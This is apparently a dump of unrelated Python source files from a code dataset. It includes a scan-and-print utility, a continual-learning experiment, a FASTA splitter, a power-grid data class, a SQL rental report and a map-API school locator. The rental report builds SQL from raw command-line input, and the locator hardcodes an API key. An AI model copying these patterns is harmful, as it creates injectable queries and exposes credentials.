= r'C:\\Program Files\\Dropbox\\Client\\Dropbox.exe'\n find, success = False, False\n for p in psutil.process_iter():\n try:\n name = p.name()\n except:\n name = ''\n continue\n if \"Dropbox.exe\" == name:\n find = True\n break\n \n if not find:\n try:\n # if not active, try the C:\\ version\n if os.path.exists(dropbox_path1):\n subprocess.Popen('\"%s\"' % dropbox_path1)\n success = True\n # try another\n elif os.path.exists(dropbox_path2):\n subprocess.Popen('\"%s\"' % dropbox_path2)\n success = True\n except:\n pass\n \n if not success:\n # if none of them works, warning and leave\n from tkinter import messagebox\n messagebox.showerror(\"錯誤\", \"請重新啟動Dropbox!!!\")\n #sys.exit(0)\n \n if u'輸入' not in os.listdir():\n LOG('創建資料夾:輸入', text)\n os.mkdir(u'輸入')\n \n if u'輸出' not in os.listdir():\n LOG('創建資料夾:輸出', text)\n os.mkdir(u'輸出')\n \n if u'原圖' not in os.listdir():\n LOG('創建資料夾:原圖', text)\n os.mkdir(u'原圖')\n \n if JSON_FILE not in os.listdir():\n d = {}\n json.dump(d, open(JSON_FILE, \"w\"))\n \n images = os.listdir(u'輸入')\n \n for image in images:\n im_file_path = os.path.join(u'輸入', image)\n \n # record current time\n use_internet_time = True\n try:\n res = urlopen('http://just-the-time.appspot.com/')\n time_str = res.read().strip().decode('utf-8')\n year, month, day = int(time_str[:4]), int(time_str[5:7]), int(time_str[8:10])\n hour, minute, second = int(time_str[11:13]), int(time_str[14:16]), int(time_str[17:19])\n now = (datetime.datetime(year, month, day, hour, minute, second)+datetime.timedelta(hours=8))\n except:\n use_internet_time = False\n now = datetime.datetime.now()\n \n convert_to_image_count = 1\n print_count = 1\n LOG('找到了 %s' % im_file_path, text)\n try:\n # Backup the image first\n backup_folder = os.path.join(u'原圖', now.strftime(\"%Y%m%d\"))\n if not os.path.exists(backup_folder):\n os.mkdir(backup_folder)\n back_path = os.path.join(backup_folder, image)\n \n log_path = os.path.join(backup_folder, DAILY_FILE)\n STEP_LOG('Start to process %s' % im_file_path, log_path)\n if use_internet_time:\n STEP_LOG('Using use_internet_time %s' % now , log_path)\n else:\n STEP_LOG('Using local time %s' % now, log_path)\n \n # Backup to origin\n copyfile(im_file_path, back_path)\n STEP_LOG('Backup to %s done' % back_path, log_path)\n \n im = cv2.imdecode(np.fromfile(im_file_path, dtype=np.uint8),-1)\n (h, w) = im.shape[:2]\n \n STEP_LOG('Get H/W of image done', log_path)\n \n # If image is too small, scale up\n try:\n if h*w <= 500*500:\n STEP_LOG('Image too small, try to scale up', log_path)\n 
output = subprocess.call([SCALE_EXE, im_file_path, '-B', '-O', '-s:200'])\n STEP_LOG('Image too small, try to scale up done', log_path)\n except:\n pass\n \n \n # Process the image\n STEP_LOG('Process the image', log_path)\n prefix = now.strftime(\"%Y%m%d%H%M%S\")\n scanner.scan(im_file_path, u'輸出', prefix)\n STEP_LOG('Process the image done', log_path)\n \n new_file_path = os.path.join(u'輸出', '{0}_{1}'.format(prefix, image))\n LOG('輸出至 %s.pdf' % new_file_path, text)\n \n # 王元元_test_20201012235527-382722.jpg\n pattern = '^(.*?)_(.*?)_(..............)-......\\.'\n \n date_file_path = os.path.join(u'輸出', 'date_{0}_{1}'.format(prefix, image))\n \n # If image is from server, add timestamps\n m = re.match(pattern, image)\n if m:\n STEP_LOG('Image is from server, add timestamps', log_path)\n from PIL import Image\n from PIL import ImageDraw \n from PIL import ImageFont \n \n d = json.load(open(JSON_FILE, \"r\"))\n date = now.strftime(\"%Y/%m/%d\")\n if date not in d or not isinstance(d[date], dict):\n d[date] = {}\n \n from_who = m.group(1)\n to_whom = m.group(2)\n ts = m.group(3)\n \n if from_who not in d[date]:\n d[date][from_who] = 0\n d[date][from_who] += 1\n \n json_update_sucess = False\n while not json_update_sucess:\n try:\n json.dump(d, open(JSON_FILE, \"w\"))\n json_update_sucess = True\n except:\n pass\n \n year, month, day = ts[:4], ts[4:6], ts[6:8]\n hour, minute, second = ts[8:10], ts[10:12], ts[12:]\n recieve_time = u'接收時間: '\n recieve_time += u'%s/%s/%s %s:%s:%s' % (year, month, day, hour, minute, second)\n \n print_time = u'列印時間: '\n print_time += now.strftime(\"%Y/%m/%d %H:%M:%S\")\n print_time += u' %s 傳給 %s 第 %d 張' % (from_who, to_whom, d[date][from_who])\n \n STEP_LOG(u'add %s 傳給 %s 第 %d 張 to image' % (from_who, to_whom, d[date][from_who]), log_path)\n \n origin_img = Image.open(new_file_path).convert('RGB').rotate(90, expand=True)\n if origin_img.size[0] <= 720:\n text_width = 20\n font = ImageFont.truetype(SIMHEI_TTF, 16, encoding=\"utf-8\")\n elif origin_img.size[0] <= 1440:\n text_width = 30\n font = ImageFont.truetype(SIMHEI_TTF, 24, encoding=\"utf-8\")\n else:\n text_width = 40\n font = ImageFont.truetype(SIMHEI_TTF, 36, encoding=\"utf-8\")\n \n STEP_LOG('Start to extend image', log_path)\n # Extend\n width, height = origin_img.size\n img = Image.new(origin_img.mode, (width, height+48), (255, 255, 255))\n img.paste(origin_img, (0, text_width*2))\n \n STEP_LOG('Start to draw image', log_path)\n draw = ImageDraw.Draw(img)\n draw.text((10, 0), recieve_time, (0, 0, 0), font=font)\n draw.text((10, text_width), print_time, (0, 0, 0), font=font)\n img = img.rotate(-90, expand=True)\n STEP_LOG('Start to save to new path', log_path)\n img.save(date_file_path)\n else:\n STEP_LOG('Not fit format, bypass the add timestamp process', log_path)\n copyfile(new_file_path, date_file_path)\n \n # Convert into pdf\n \n while convert_to_image_count < 4:\n try:\n STEP_LOG('Convert to image, count %d' % convert_to_image_count, log_path)\n with open(os.path.abspath(\"%s.pdf\" % date_file_path), 'wb') as f:\n f.write(img2pdf.convert(os.path.abspath(date_file_path), fit='fill'))\n STEP_LOG('Convert to image done', log_path)\n break\n except:\n convert_to_image_count += 1\n \n \n LOG('刪除 %s' % im_file_path, text)\n STEP_LOG('Try to remove %s' % im_file_path, log_path)\n count = safe_remove(im_file_path)\n STEP_LOG('Try to remove %s done, try %d time' % (im_file_path, count), log_path)\n \n LOG('列印 %s' % im_file_path, text)\n if not args.debug:\n \n while print_count < 4:\n try:\n STEP_LOG('Print 
pdf, count %d' % print_count, log_path)\n subprocess.call([PDFTOPRINTER_EXE, \"%s.pdf\" % os.path.abspath(date_file_path)])\n STEP_LOG('Print pdf, done', log_path)\n break\n except:\n print_count += 1\n \n STEP_LOG('Try to remove %s' % new_file_path, log_path)\n count = safe_remove(new_file_path)\n STEP_LOG('Try to remove %s done, try %d time' % (new_file_path, count), log_path)\n \n STEP_LOG('Try to remove %s' % (\"%s.pdf\" % os.path.abspath(date_file_path)), log_path)\n count = safe_remove(\"%s.pdf\" % os.path.abspath(date_file_path))\n STEP_LOG('Try to remove %s done, try %d time' % (\"%s.pdf\" % os.path.abspath(date_file_path), count), log_path)\n \n STEP_LOG('Try to remove %s' % date_file_path, log_path)\n count = safe_remove(date_file_path)\n STEP_LOG('Try to remove %s done, try %d time' % (date_file_path, count), log_path)\n STEP_LOG('SUCCESS', log_path)\n \n except:\n LOG('處理 %s 失敗' % im_file_path, text)\n STEP_LOG('[!!!!Exception!!!!!]', log_path)\n STEP_LOG('convert_to_image_count = %d' % convert_to_image_count, log_path)\n STEP_LOG('print_count = %d' % print_count, log_path)\n \n folders = os.listdir(u'原圖')\n now = datetime.datetime.now()\n # Step 2, delete the folder that is expire\n for folder in folders:\n try:\n date = datetime.datetime.strptime(folder, \"%Y%m%d\")\n if (now - date).days >= 7:\n rmtree(os.path.join(u'原圖', folder))\n LOG('刪除原圖 %s' % folder, text)\n except:\n traceback.print_exc()\n pass\n \n window.after(1000, worker, scanner, window, text)\n \n\nif __name__ == \"__main__\":\n from tkinter import messagebox\n \n try:\n me = SingleInstance()\n except:\n messagebox.showerror(\"錯誤\", \"請勿重複開啟銳利化程式!!!\")\n sys.exit(1)\n \n try:\n if not internet_checker.check_internet_on():\n messagebox.showerror(\"錯誤\", \"請先開啟網路!!!\")\n raise RuntimeError('No internet connection')\n except:\n print('Internet check fail')\n sys.exit(1) \n \n try:\n url = 'https://raw.githubusercontent.com/wty1143/OpenCV-Document-Scanner/master/version_info.txt'\n res = urlopen(url)\n version_str = float(res.read().strip().decode('utf-8')[8:])\n if version_str > float(VERSION):\n messagebox.showerror(\"錯誤\", \"請更新主程式!!!\")\n raise RuntimeError('Version too old error')\n except RuntimeError:\n print('Version check fail')\n sys.exit(1)\n except:\n pass\n \n\n \n global args\n ap = argparse.ArgumentParser()\n #ap.add_argument(\"--make_key\", action='store_true')\n ap.add_argument(\"--debug\", action='store_true')\n \n args = ap.parse_args()\n \n #def register(info, expire):\n # if info != '55665566':\n # print('密碼錯誤')\n # sys.exit(0)\n # \n # uuid = subprocess.Popen(['wmic', 'csproduct','get' ,'UUID'], \n # shell=True, \n # stdout=subprocess.PIPE, \n # stderr=subprocess.PIPE, \n # stdin=subprocess.PIPE).stdout.read().decode('ascii')\n # \n # ciphertext = encrypt(expire.strftime(\"%Y%m%d\")+uuid)\n # \n # with open(key_path, 'wb') as f:\n # f.write(ciphertext)\n # sys.exit(0)\n\n #if args.make_key:\n # print('註冊中')\n # \n # d = datetime.timedelta(days = 80*365)\n # expire = datetime.datetime.now()\n #\n # \n # parent = Tk()\n # widget = Entry(parent, textvariable='註冊碼', bd=5, show=\"*\", width=30)\n # widget.pack()\n # parent.bind('', lambda v: register(widget.get(), expire))\n # parent.mainloop()\n \n \n window = Tk()\n window.title('自動黑白銳利化')\n window.geometry('400x300')\n window.configure(background='white')\n\n text = Text(window, width=360, height=280)\n text.pack()\n \n #if not integrity_test(window, text):\n # sys.exit(0)\n \n # Force disable interactive_mode\n scanner = 
scan.DocScanner(False)\n LOG(\"銳利化程式執行中 版本 %s\" % VERSION, text)\n \n version_update_sucess = False\n while not version_update_sucess:\n try:\n with open('version.txt', 'w') as f:\n f.write(VERSION)\n version_update_sucess = True\n except:\n pass\n \n window.after(1000, worker, scanner, window, text)\n \n window.mainloop()","sub_path":"auto_scan.py","file_name":"auto_scan.py","file_ext":"py","file_size_in_byte":19499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"286007187","text":"#!/usr/bin/env python3\nimport numpy as np\nimport torch\nimport torchvision.transforms as transforms\nfrom torch.optim import SGD\nfrom torchvision.transforms import ToTensor\n\nfrom avalanche.benchmarks.classic import SplitCIFAR100\nfrom avalanche.evaluation.metrics import accuracy_metrics, loss_metrics\nfrom avalanche.logging import InteractiveLogger\nfrom avalanche.training.plugins import EvaluationPlugin\nfrom avalanche.training.supervised import ER_AML\nfrom experiments.utils import create_default_args, set_seed\nfrom models import SingleHeadReducedResNet18\n\n\ndef eraml_scifar100(override_args=None):\n \"\"\"\n Reproducing ER-AML experiments from paper\n \"New insights on Reducing Abrupt Representation Change in Online Continual Learning\"\n by Lucas Caccia et. al\n https://openreview.net/forum?id=N8MaByOzUfb\n \"\"\"\n args = create_default_args(\n {\n \"cuda\": 0,\n \"mem_size\": 10000,\n \"lr\": 0.1,\n \"temp\": 0.1,\n \"train_mb_size\": 10,\n \"seed\": None,\n \"batch_size_mem\": 10,\n },\n override_args,\n )\n set_seed(args.seed)\n fixed_class_order = np.arange(100)\n device = torch.device(\n f\"cuda:{args.cuda}\" if torch.cuda.is_available() and args.cuda >= 0 else \"cpu\"\n )\n unique_transform = transforms.Compose(\n [\n ToTensor(),\n transforms.Normalize((0.5071, 0.4866, 0.4409), (0.2009, 0.1984, 0.2023)),\n ]\n )\n scenario = SplitCIFAR100(\n 20,\n return_task_id=False,\n seed=0,\n fixed_class_order=fixed_class_order,\n shuffle=True,\n class_ids_from_zero_in_each_exp=False,\n train_transform=unique_transform,\n eval_transform=unique_transform,\n )\n input_size = (3, 32, 32)\n model = SingleHeadReducedResNet18(100)\n optimizer = SGD(model.parameters(), lr=args.lr)\n interactive_logger = InteractiveLogger()\n loggers = [interactive_logger]\n training_metrics = []\n evaluation_metrics = [\n accuracy_metrics(epoch=True, stream=True),\n loss_metrics(epoch=True, stream=True),\n ]\n evaluator = EvaluationPlugin(\n *training_metrics,\n *evaluation_metrics,\n loggers=loggers,\n )\n plugins = []\n cl_strategy = ER_AML(\n model=model,\n feature_extractor=model.feature_extractor,\n optimizer=optimizer,\n plugins=plugins,\n evaluator=evaluator,\n device=device,\n train_mb_size=args.train_mb_size,\n eval_mb_size=64,\n mem_size=args.mem_size,\n batch_size_mem=args.batch_size_mem,\n )\n for t, experience in enumerate(scenario.train_stream):\n cl_strategy.train(\n experience,\n num_workers=0,\n drop_last=True,\n )\n cl_strategy.eval(scenario.test_stream[: t + 1])\n results = cl_strategy.eval(scenario.test_stream)\n return results\n\n\nif __name__ == \"__main__\":\n res = eraml_scifar100()\n print(res)\n","sub_path":"experiments/split_cifar100/er_aml.py","file_name":"er_aml.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"277389279","text":"#!/usr/bin/python\nimport os\nimport sys\nimport gzip\n\nfilename_fa = sys.argv[1]\n\nh = ''\nseq_list = 
dict()\nseqlen = dict()\n# open transparently; use text mode ('rt') for gzip so lines are str, not bytes\nif( filename_fa.endswith('.gz') ):\n    f_fa = gzip.open(filename_fa,'rt')\nelse:\n    f_fa = open(filename_fa,'r')\nfor line in f_fa:\n    if( line.startswith('>') ):\n        h = line.strip().lstrip('>')\n        seq_list[h] = []\n        seqlen[h] = 0\n    else:\n        seq_list[h].append( line.strip() )\n        seqlen[h] += len( line.strip() )\nf_fa.close()\n\nfilename_base = filename_fa.replace('.fasta','').replace('.fa','').replace('_fa','').replace('.gz','')\n\n# sequences longer than 10 kb go to *_lt10k_fa, the rest to *_set10k_fa\nf_lt10k = open('%s_lt10k_fa'%filename_base,'w')\nf_set10k = open('%s_set10k_fa'%filename_base,'w')\n\nfor tmp_h in sorted( seqlen.keys(), key=seqlen.get, reverse=True):\n    tmp_seq = ''.join(seq_list[tmp_h])\n    if( len(tmp_seq) > 10000 ):\n        f_lt10k.write('>%s\\n%s\\n'%(tmp_h,tmp_seq))\n    else:\n        f_set10k.write('>%s\\n%s\\n'%(tmp_h,tmp_seq))\n\nf_lt10k.close()\nf_set10k.close()\n","sub_path":"fasta/split-lt10k-set10k.py","file_name":"split-lt10k-set10k.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"229452315","text":"# Copyright (C) 2010-2011 Richard Lincoln\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to\n# deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n\nfrom CIM16.IEC61970.Core.Curve import Curve\n\nclass FuelAllocationSchedule(Curve):\n    \"\"\"The amount of fuel of a given type which is allocated for consumption over a specified period of time.\n    \"\"\"\n\n    def __init__(self, minFuelAllocation=0.0, fuelAllocationEndDate='', maxFuelAllocation=0.0, fuelAllocationStartDate='', fuelType=\"oil\", FossilFuel=None, ThermalGeneratingUnit=None, *args, **kw_args):\n        \"\"\"Initialises a new 'FuelAllocationSchedule' instance.\n\n        @param minFuelAllocation: The minimum amount of fuel that is allocated for consumption for the scheduled time period, e.g., based on a 'take-or-pay' contract \n        @param fuelAllocationEndDate: The end time and date of the fuel allocation schedule \n        @param maxFuelAllocation: The maximum amount of fuel that is allocated for consumption for the scheduled time period \n        @param fuelAllocationStartDate: The start time and date of the fuel allocation schedule \n        @param fuelType: The type of fuel, which also indicates the corresponding measurement unit. Values are: \"oil\", \"coal\", \"lignite\", \"gas\"\n        @param FossilFuel: A fuel allocation schedule must have a fossil fuel\n        @param ThermalGeneratingUnit: A thermal generating unit may have one or more fuel allocation schedules\n        \"\"\"\n        #: The minimum amount of fuel that is allocated for consumption for the scheduled time period, e.g., based on a 'take-or-pay' contract\n        self.minFuelAllocation = minFuelAllocation\n\n        #: The end time and date of the fuel allocation schedule\n        self.fuelAllocationEndDate = fuelAllocationEndDate\n\n        #: The maximum amount of fuel that is allocated for consumption for the scheduled time period\n        self.maxFuelAllocation = maxFuelAllocation\n\n        #: The start time and date of the fuel allocation schedule\n        self.fuelAllocationStartDate = fuelAllocationStartDate\n\n        #: The type of fuel, which also indicates the corresponding measurement unit. Values are: \"oil\", \"coal\", \"lignite\", \"gas\"\n        self.fuelType = fuelType\n\n        self._FossilFuel = None\n        self.FossilFuel = FossilFuel\n\n        self._ThermalGeneratingUnit = None\n        self.ThermalGeneratingUnit = ThermalGeneratingUnit\n\n        super(FuelAllocationSchedule, self).__init__(*args, **kw_args)\n\n    _attrs = [\"minFuelAllocation\", \"fuelAllocationEndDate\", \"maxFuelAllocation\", \"fuelAllocationStartDate\", \"fuelType\"]\n    _attr_types = {\"minFuelAllocation\": float, \"fuelAllocationEndDate\": str, \"maxFuelAllocation\": float, \"fuelAllocationStartDate\": str, \"fuelType\": str}\n    _defaults = {\"minFuelAllocation\": 0.0, \"fuelAllocationEndDate\": '', \"maxFuelAllocation\": 0.0, \"fuelAllocationStartDate\": '', \"fuelType\": \"oil\"}\n    _enums = {\"fuelType\": \"FuelType\"}\n    _refs = [\"FossilFuel\", \"ThermalGeneratingUnit\"]\n    _many_refs = []\n\n    def getFossilFuel(self):\n        \"\"\"A fuel allocation schedule must have a fossil fuel\n        \"\"\"\n        return self._FossilFuel\n\n    def setFossilFuel(self, value):\n        if self._FossilFuel is not None:\n            filtered = [x for x in self.FossilFuel.FuelAllocationSchedules if x != self]\n            self._FossilFuel._FuelAllocationSchedules = filtered\n\n        self._FossilFuel = value\n        if self._FossilFuel is not None:\n            if self not in self._FossilFuel._FuelAllocationSchedules:\n                self._FossilFuel._FuelAllocationSchedules.append(self)\n\n    FossilFuel = property(getFossilFuel, setFossilFuel)\n\n    def getThermalGeneratingUnit(self):\n        \"\"\"A thermal generating unit may have one or more fuel allocation schedules\n        \"\"\"\n        return self._ThermalGeneratingUnit\n\n    def setThermalGeneratingUnit(self, value):\n        if self._ThermalGeneratingUnit is not None:\n            filtered = [x for x in self.ThermalGeneratingUnit.FuelAllocationSchedules if x != self]\n            self._ThermalGeneratingUnit._FuelAllocationSchedules = filtered\n\n        self._ThermalGeneratingUnit = value\n        if self._ThermalGeneratingUnit is not None:\n            if self not in self._ThermalGeneratingUnit._FuelAllocationSchedules:\n                self._ThermalGeneratingUnit._FuelAllocationSchedules.append(self)\n\n    ThermalGeneratingUnit = property(getThermalGeneratingUnit, setThermalGeneratingUnit)\n\n","sub_path":"CIM16/IEC61970/Generation/Production/FuelAllocationSchedule.py","file_name":"FuelAllocationSchedule.py","file_ext":"py","file_size_in_byte":5477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"277238326","text":"## create a mapping of state to abbreviation\r\n#states = {\r\n#    'Oregon': 'OR',\r\n#    'Florida': 'FL',\r\n#    'California': 'CA',\r\n#    'New York': 'NY',\r\n#    'Michigan': 'MI'\r\n#    }\r\n#\r\n# create a basic set of states and some cities in them\r\ncities = {\r\n    'CA': 'San Francisco',\r\n    'MI': 'Detroit',\r\n    'FL': 'Jacksonville'\r\n    }\r\n\r\n# add some more cities\r\ncities['NY']= 'New York'\r\ncities['OR']= 'Portland'\r\n\r\n## print out some cities\r\n#print ('_' * 10)\r\n#print (\"NY State has: \",cities['NY'])\r\n#print (\"OR State has: \",cities['OR'])\r\n#\r\n## print some states\r\n#print ('_' * 10)\r\n#print (\"Michigan's abbreviation is: \",states['Michigan'])\r\n#print (\"Florida's abbreviation is: \",states['Florida'])\r\n#\r\n## do it by using the state then cities dict\r\n#print ('_'*10)\r\n#print (\"Michigan has:\",cities[states['Michigan']])\r\n#print (\"Florida has:\" ,cities[states['Florida']])\r\n#\r\n## print every state abbreviation\r\n#print ('_'*10)\r\n#for state,abbrev in states.items():\r\n#    print (\"%s is abbreviated %s\" %(state,abbrev))\r\n#\r\n## print every city in state\r\n#print ('_'*10)\r\n#for abbrev,city in cities.items():\r\n#    print(\"%s has the city %s\" %(abbrev,city))\r\n#\r\n## now do both at the same time\r\n#print ('_'*10)\r\n#for state,abbrev in states.items():\r\n#    print (\"%s state is abbreviated %s and has city %s\" %(state,abbrev,cities[abbrev]))\r\n#\r\n#print ('_' *10)\r\n## safely get an abbreviation by state that might not be there\r\n#state = states.get('Texas',None)\r\n#\r\n#if not state:\r\n#    print (\"Sorry, no Texas.\")\r\n#\r\n##get a city with a default value\r\n#city = cities.get('TX','Does Not Exist')\r\n#print (\"The city for the state 'TX' is : %s\" %city)\r\n\r\ndef find_city(themap,state):\r\n    if state in themap:\r\n        return themap[state]\r\n    else:\r\n        return \"Not found.\"\r\n\r\n# ok pay attention!\r\ncities['_find'] = find_city\r\n# the dict now also holds an element named '_find' whose value is the function find_city\r\n#print (cities)\r\nwhile True:\r\n    print (\"State? (ENTER to quit)\",)\r\n    state = input(\"> \")\r\n\r\n    if not state:break\r\n\r\n    # this line is the most important ever! study!\r\n    city_found = cities['_find'](cities,state)\r\n    # nested dict call: cities['_find'] is find_city,\r\n    # i.e. this statement is the same as find_city(cities,state)\r\n    print (city_found)\r\n","sub_path":"ex39.py","file_name":"ex39.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"171733685","text":"'''\n# summary.py. Sixth programming project for CIS 211 (WQ 2015).\n\n\n# Author: Ricardo Pivetta.\n\n# This module fills all the requirements for project six, no extras.\n\n'''\nimport sqlite3\nimport sys\nfrom datetime import *\n\nif __name__ == \"__main__\":\n    #setting the connection with the sql\n    con = sqlite3.connect('sakila211.db')\n    cursor = con.cursor()\n\n    date_format = \"%Y-%m-%d %H:%M:%S.%f\"\n    date_format_display = '%m-%d-%Y'\n    total = 0\n    #getting the arguments\n    lname = sys.argv[1]\n    year = sys.argv[2]\n    month = sys.argv[3]\n\n    #running the query to select everything that I need from the database\n    query = \"select customer.first_name, film.title, customer.last_name, rental.rental_date, film.rental_rate, rental.return_date, film.rental_duration \" \\\n            \" from customer \"\\\n            \" join rental \"\\\n            \" on customer.customer_id = rental.customer_id \"\\\n            \" join inventory \"\\\n            \" on rental.inventory_id = inventory.inventory_id \"\\\n            \" join film \"\\\n            \" on inventory.film_id = film.film_id \"\\\n            \" where customer.last_name like '{0}' \"\\\n            \" and strftime('%Y', rental_date) = '{1}' \"\\\n            \" and strftime('%m', rental_date) like '%{2}'\"\n    cursor.execute(query.format(lname,year,month))\n    row = cursor.fetchall()\n\n    print('')\n    print('--------- Sakila DVD Rentals --------- ')\n    print('')\n    print(\"Monthly report for {0} {1}\\n\".format(row[0][0], lname))\n    print('')\n\n    #for each row in data, check the rental and return date, and also sum the price\n    for i in range(len(row)):\n        rented = datetime.strptime(row[i][3], date_format) #getting the rental date\n        returned = datetime.strptime(row[i][5], date_format) #getting the return date\n        total = total + row[i][4] #sum of the total rental price\n        print('{0:<20} {1:<12} {2:<10}'.format(row[i][1],rented.strftime(date_format_display),row[i][4])) #displaying rental\n\n        #checking, printing and summing the late fees\n        diff = returned - rented\n        if diff.days > row[i][6]:\n            print(' **late fee {0} {1:6}'.format(returned.strftime(date_format_display),row[i][4]))\n            total = total + row[i][4]\n\n    #printing the total to pay\n    print(\"\\nMonthly total: %.2f\" % total)","sub_path":"summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"109803567","text":"import json\nimport requests\ndef school_score(address):\n    elem_distance = []\n    mid_distance = []\n    high_distance = []\n    univercity_distance = []\n    elem_school=[]\n    mid_school=[]\n    high_school=[]\n    univercity=[]\n    url = \"https://dapi.kakao.com/v2/local/search/address.json?\"\n    apikey = \"15423876a0c084fd44724b06f11395a9\"\n    query = address # input address\n    r1 = requests.get( url, params = {'query':query}, headers={'Authorization' : 'KakaoAK ' + apikey } )\n    rj=r1.json()\n    # print(r1.json())\n    x=r1.json()['documents'][0][\"x\"]\n    y=r1.json()['documents'][0][\"y\"]\n    n=1\n    while(True):\n        url = \"https://dapi.kakao.com/v2/local/search/keyword.json?\"\n        apikey = \"15423876a0c084fd44724b06f11395a9\"\n        query = \"학교\"\n        # category codes: subway SW8, bus stop, convenience store CS2, mart MT1, school SC4, bank BK9, restaurant FD6, cafe CE7, hospital HP8\n        category_group_code = \"SC4\"\n        radius=1000\n        page=n # pages past the last page just repeat the last page's results\n        size=15\n        r = requests.get(url, params = {'query':query,'category_group_code':category_group_code,'radius':radius,'page':page,'size':size,'x':x,'y':y, 'sort': 'distance'}, headers={'Authorization' : 'KakaoAK ' + apikey } )\n        r.json()\n        # print(r.json())\n        # print(r.json()[\"meta\"][\"total_count\"]) # total number of results found\n        if r.json()[\"meta\"][\"total_count\"]==0:\n            print(\"검색된 데이터가 없습니다.\")\n            return None\n        for i in range(len(r.json()[\"documents\"])):\n            # print(r.json()[\"documents\"][i][\"distance\"])\n            category_name=r.json()['documents'][i]['category_name']\n            if category_name=='교육,학문 > 학교 > 초등학교':\n                elem_distance.append(r.json()['documents'][i]['distance'])\n                elem_school.append(r.json()['documents'][i])\n            elif category_name=='교육,학문 > 학교 > 중학교':\n                mid_distance.append(r.json()['documents'][i]['distance'])\n                mid_school.append(r.json()['documents'][i])\n            elif category_name=='교육,학문 > 학교 > 대학교':\n                univercity_distance.append(r.json()['documents'][i]['distance'])\n                univercity.append(r.json()['documents'][i])\n            else:\n                high_distance.append(r.json()['documents'][i]['distance'])\n                high_school.append(r.json()['documents'][i])\n\n        is_end = r.json()[\"meta\"][\"is_end\"]\n        # with open('jsonFile\\\\school'+str(n)+'.json', 'w', encoding='utf-8') as make_file:\n        #     json.dump(r.json(), make_file, ensure_ascii=False, indent=\"\\t\")\n        if is_end:\n            break\n        n+=1\n\n    # print(distance)\n\n    if len(elem_school)==0:\n        elem_distance.append(9999)\n    if len(mid_school)==0:\n        mid_distance.append(9999)\n    if len(high_school)==0:\n        high_distance.append(9999)\n    if len(univercity)==0:\n        univercity_distance.append(9999)\n\n    # print(elem_school)\n    # print(min(elem_distance)) # distance to the nearest elementary school\n    # print(mid_school)\n    # print(min(mid_distance)) # distance to the nearest middle school\n    # print(high_school)\n    # print(min(high_distance)) # distance to the nearest high school\n    # print(univercity)\n    # print(min(univercity_distance)) # distance to the nearest university\n\n    return query,min(elem_distance),min(mid_distance),min(high_distance),min(univercity_distance)","sub_path":"python_data/RestApi_school.py","file_name":"RestApi_school.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"264304687","text":"#!/usr/bin/env python \n# -*- coding: utf-8 -*-\n\n#-----------------------------------------------------------------------------\n# Copyright (c) 2013, NeXpy Development Team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file COPYING, distributed with this software.\n#-----------------------------------------------------------------------------\nfrom __future__ import (absolute_import, division, print_function,\n                        unicode_literals)\nimport six\n\nimport imp\nimport logging\nimport numbers\nimport os\nimport re\nimport sys\n\nfrom .pyqt import QtGui, QtCore, getOpenFileName\nimport pkg_resources\nimport numpy as np\nfrom scipy.optimize import minimize\n\ntry:\n    from collections import OrderedDict\nexcept ImportError:\n    from ordereddict import OrderedDict\n\nfrom nexusformat.nexus import (NeXusError, NXgroup, NXfield, NXattr,\n                               NXroot, NXentry, NXdata, NXparameters)\n\n\ndef wrap(text, length):\n    words = text.split()\n    lines = []\n    line = ''\n    for w in words:\n        if len(w) + len(line) > length:\n            lines.append(line)\n            line = ''\n        line = line + w + ' '\n        if w is words[-1]: lines.append(line)\n    return '\\n'.join(lines)\n\n\ndef natural_sort(key):\n    import re\n    return [int(t) if t.isdigit() 
else t for t in re.split(r'(\\d+)', key)] \n\n\nclass BaseDialog(QtGui.QDialog):\n \"\"\"Base dialog class for NeXpy dialogs\"\"\"\n \n def __init__(self, parent=None):\n\n self.accepted = False\n from .consoleapp import _mainwindow\n self.mainwindow = _mainwindow\n self.treeview = self.mainwindow.treeview\n self.default_directory = _mainwindow.default_directory\n self.import_file = None # must define in subclass\n self.nexus_filter = ';;'.join((\n \"NeXus Files (*.nxs *.nx5 *.h5 *.hdf *.hdf5)\",\n\t \"Any Files (*.* *)\"))\n\n if parent is None:\n parent = self.mainwindow\n super(BaseDialog, self).__init__(parent)\n\n def set_layout(self, *items):\n self.layout = QtGui.QVBoxLayout()\n for item in items:\n if isinstance(item, QtGui.QLayout):\n self.layout.addLayout(item)\n elif isinstance(item, QtGui.QWidget):\n self.layout.addWidget(item)\n self.setLayout(self.layout)\n\n def set_title(self, title):\n self.setWindowTitle(title)\n\n def close_buttons(self, save=False):\n \"\"\"\n Creates a box containing the standard Cancel and OK buttons.\n \"\"\"\n 